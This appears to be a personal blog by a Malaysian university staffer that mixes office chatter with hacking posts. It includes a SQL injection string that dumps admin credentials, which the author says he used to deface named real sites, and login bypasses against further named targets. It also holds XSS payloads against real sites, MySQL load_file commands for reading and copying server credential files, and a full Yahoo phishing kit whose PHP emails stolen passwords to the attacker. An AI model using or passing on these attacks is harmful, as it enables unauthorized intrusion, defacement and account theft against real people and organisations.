Based from the milworm exploit. I managed to defaced these pages via sql injections.
Changed a bit the sql injections


view_sub_cat.php?cat_id=99%20UNION%20ALL%20SELECT%201,2,concat(,admin_user,::,admin_password,),4%20FROM%20admin_users--


http://www.virtuosoworld.com/



http://bye5.com/indexXXXX.php


Greetz to : t0pP8uZz & xprog

Attn: alycia
Based on my findings yesterday, here are some hardening tips to your apache server.

1. To disable server-infoOpen your apache httpd.conf, find the following paragaraph
SetHandler server-info
Order deny,allow
Allow from all
Change to this to, then restart your apache(httpd) server.
SetHandler server-info
Order deny,allow
#Allow from all
Deny from all

2. To disable server-statusOpen your apache httpd.conf, find the following paragaraph
SetHandler server-status
Order deny,allow
Allow from all
Change to this to, then restart your apache(httpd) server.
SetHandler server-status
Order deny,allow
#Allow from all
Deny from all

3. To disable directory listing, which is the most crucial part.Open your apache httpd.conf, find the following paragaraph
Options FollowSymLinks ExecCGI Indexes
AllowOverride None
# Controls who can get stuff from this server.
Order allow,deny
Allow from all
Change to this to, then restart your apache(httpd) server.
Options FollowSymLinks ExecCGI Indexes
AllowOverride None
# Controls who can get stuff from this server.
Order allow,deny
#Allow from all
Deny from all

If you done it right, you'll get 403 Forbidden error message when trying to access the 'vulnerable' page

Open source is secure only if you put some effort to secure it. Otherwise, it is more vulnerable comparing to windows

Att: alycia
Just now I did a very simple 'test' on that server, I found the directory listing is on. The interesting directories are :
/admin/
/server-status/
/server-info/

Both the server-* directories are only information disclosure vulnerabilites.
But the /admin/.. hmm.. looks interesting.

To do a complete pen-test, needs a lot of time, there's no a single silver bullet to 'hack'.

Last week, I found that the application is vulnerable to cookie-session injection attack. I told abg mazani, and give him the proper solution.

Downloaded the new version of languard http://www.gfi.com/lannetscan/
Did'nt have much time to test it though.


Splash screen - looks the same as version 7.0


Performing a remote test on aunty virus's pc. :)

Ah so boring.. to teach microsoft powerpoint..
Trying to do a POC on XSS. Just popping a simple alert dialog box.
[script]alert('POC of XSS by ghimau')[/script]

Click here : http://www.danceinterrupted.com/guestbook.asp

Do redirect to another page, making it looks like been defaced, use this script.
[script]window.location = "http://www.google.com"[/script]

While helping Abg Mazani teaching Powerpoint Course, I did 'try' some sites hunting for sql injections login bypass.

Kak Zaimah did'nt come to ofiice today.


Indian Jurnal Site login page


Logged in as the first user


Got the username


Cineplex login page



Logged in :)

Target : http://219.94.87.77/BP/Asps/Login/default.asp
Table UserAcc
Column varUserID,varUserPwd

Keyword is : blind *ql hihihi

My latest points on Hellbound Hackers :)



Hackers are here, where are you?

Isk..Isk.. While I was creating the report for 'Pertandingan Laman Web', I noticed that En. Aziz's marks is missing. I told aunty virus about that.

We were busy searching the file, almost 1 hour of blind search! The file was on Kak Liza's table all the while! Hampeh!

The sad thing is that, the file is about 2 inchies thick.. and I have to review the marks.. Ah! 'Tidak!'

Added a couple of tutorials on Hacking Windows XP.

HackerMalaysia thread (Part 1) :
http://www.hackermalaysia.com/forum/viewthread.php?forum_id=17&thread_id=363&pid=2889#post_2889

HackerMalaysia thread(Part2):
http://www.hackermalaysia.com/forum/viewthread.php?forum_id=17&thread_id=364&pid=2890#post_2890

Pdf version:
Part 1 : http://www.geocities.com/terlaklintau/xp/XP1.pdf
Part2 : http://www.geocities.com/terlaklintau/xp/XP2.pdf

Hmm.. this morning aunty virus told me to settle 'Pertandingan Laman Web''s matters. She 'sempat mengumpat mak tiri' Hihihi

Hmm.. My Bos aunty virus, asked me to call an officer regarding 'Pertandingan Laman Web'. While searching his telephone number in his agency's site (a very well known government agency), i found a bug that 'might' lead to be defaced! The infamous rfi bug. Hmm..

I did'nt go any further to test the bug. I've informed the appropriate person handling this kind of issue.

http://xxx.xxxxx.xxx.xx/xxxxxx.php?section=[evil script]

Hmm.. an IBM Security Site, regarding mitigating XSS attack. The funny thing is that, the site itself is vulnerable to XSS attack! What the hell :)

Just open (copy and paste it in your ie) the link below, and you'll notice a nice pop up, showing my name. Muhahaha

http://www-1.ibm.com/support/docview.wss?uid=swg21233077&loc=%22%3E%3Cbody%20onload=alert('ghimau')%20x=%22en_US

Added a tutorial on basic C programming. Posted in HackerMalaysia site. I've uploaded the pdf version to my site. Feel free to review it :)

Part 1
Part 2

Hmm.. I came across a nice pdf document regarding Hacking History.

Quite a dull evening. Need to take a break.

Hmm..
Want to try hack your server via mysql?
Hihihi

Ok, you can 'print' any file in the server to the monitor (running mysql) using load_file() function, in mysql.

Go to your command prompt.
mysql>

Type in the following command:
mysql>select load_file('c:/dns.txt');

dns.txt can be any file in your server

By using load data infile function, you can transfer any file, or database content to a newly created database.

mysql>load data infile 'c/dns.txt' into table table_name;

Ok.. so you want to copy a table to your newly created table?

mysql> create database db_ghimau;
mysql> use db_ghimau;
mysql> create table tbl_ghimau (filename varchar(20),content longblob);

Then copy the data!

mysql> insert into tbl_ghimau values ('user.frm',load_file('c:\\MySQL\\data\\mysql\\user.frm'));
mysql> insert into tbl_ghimau values ('user.MYI',load_file('c:\\MySQL\\data\\mysql\\user.MYI'));
mysql> insert into tbl_ghimau values ('user.MYD',load_file('c:\\MySQL\\data\\mysql\\user.MYD'));

Hmm.. Today, aunty virus and i have to meet Dr Baharom UPEN, discussing about homestay's website. Argh..

Hmm.. the internet connection is so slow.. i think a snail is much more faster!

I've called mastura from fbest, and sharifah from pelegong, asking them to send the details and information regarding their homestay's, to develop a site for them.

Hmm.. its not a big deal for me to create a site, but the problem is.. graphics !
I just cannot put my hands on 'graphics' :)

Hmm.. After all, I'm in the multimedia unit.. so this is what i have to do.. :(

I called Adonis, regarding my C|EH exam transcript.
Presenting.. mark.. (Riaknya aku :)



Remember to click the above image, to see a larger view..
So Kak Zaimah.. are you jeles? :P

Welcome to Miss Alycia to hakes club.

May the force be with you..

Muhahahaha (Gelak hakes)

What is APC? Anugerah Perkhidmatan Cemerlang. :)
Today, I'm going for the ceremony..

Thanks a lot to my friends in UPTM, especially to my bos Puan Zaimah (yang nak jadi hakes), my Pengarah, Puan Hajah Ruhazah and my best friend, Mazni (kecik 13).

Thanks to ya all.

Hmm.. I'm working on a tutorial, to add contents via Events Calendar components. Arif from Gemas called Kak Zaimah this morning, asking for the tutorial.

Hmm.. yesterday, Kak Yati asked me, if i know how to enable Run menu, if it is disabled by virus.

OK.. I've created a simple VB Script, to do the job. You can download it at http://geocities.com/terlaklintau/recoverrun.txt
Just rename the file from recoverrun.txt to recoverrun.vbs. Double click on the file, and you have it :)

So wan and nizam can simply download and use this script.

Hmm.. Yes.. Kak Zaimah was so 'malu' because she bet me, she can save flash file from her ie. I've told her she cant do that, but she was so 'degil'

Hihihi

Only 'hakes' can download flash file via Internet Explorer. Hahahaha

Hmm.. UIA.. a nice place..
But unlucky for me.. I was there for only 1 semester.. :)


UIA waterfront



Nice .. huh!



Garden of Knowledge and Virtue



UIA...

Wanna hack yahoo mail?

Hihihi.. yes you can.. but you dont have to hack yahoo's server, the only thing you need is some sort of social engineering attack (some might called phishing).

Ok.. let's move on..

1. Create a php file, with the following code. Then upload it, on your favourite web hosting. But be sure that your hosting supports PHP.


youre_email@your_domain.com";
$dari=$login."@yahoo.com";
$mesej="Email :".$login."@yahoo.com , passwordnya :".$passwd;
$subjek = "DMangsa baru.. hihihih : ".$login."@yahoo.com";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= 'From:'.$dari;
$kirim=mail($dari, $subjek, $mesej, $headers);
if($kirim)
{ header("location:http://mail.yahoo.com");
}
else { header("location:login.htm");
}
?>

2. Download the yahoo mail login page. Change the action= to your newly php file.

3. Send a link to your victim.

4. Just hope that he/she logs in, and you'll get a email automatically with the victim's username and password